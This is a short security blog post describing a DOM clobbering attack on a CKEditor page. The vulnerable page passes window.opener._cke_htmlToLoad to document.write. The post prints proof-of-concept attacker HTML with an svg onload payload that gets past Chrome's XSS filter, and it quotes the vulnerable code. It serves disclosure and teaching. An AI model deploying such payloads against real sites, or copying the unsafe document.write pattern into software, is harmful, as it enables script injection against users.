Chrome XSS filter bypass for a DOM clobbering attack

I Found an Interesting Chrome XSS filter bypass in @0x6D6172696F's @nullcon training for this DOM clobbering attack

Window.opener can sometimes act nasty to launch XSS attacks. There is an interesting XSS filter bypass which I found during Mario Heiderich’s training at NullCon, Goa 2015.

In the below DOM clobbering attack (CKEditor DOM XSS issue), a page hosting the following malicious link will trigger DOM XSS on the target application once clicked:

<a href="vuln.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">XSS ME!</a>

The above attack vector will only work on IE and will be blocked by Chrome’s XSS filter. A way to bypass is to craft the attacker page with the following code:

<a href="#<svg onload=alert(1)>" id="_cke_htmlToLoad"></a>
<a href="vuln.html" target="_blank" id="_c">XSS ME!</a>

Vulnerable code:

var doc = document;;
doc.write( window.opener._cke_htmlToLoad );   // << Vulnerable code

delete window.opener._cke_htmlToLoad;

</script> [Changelog for the XSS fix]

Found on: 05 Feb 2015 

Related Posts
« Prev Post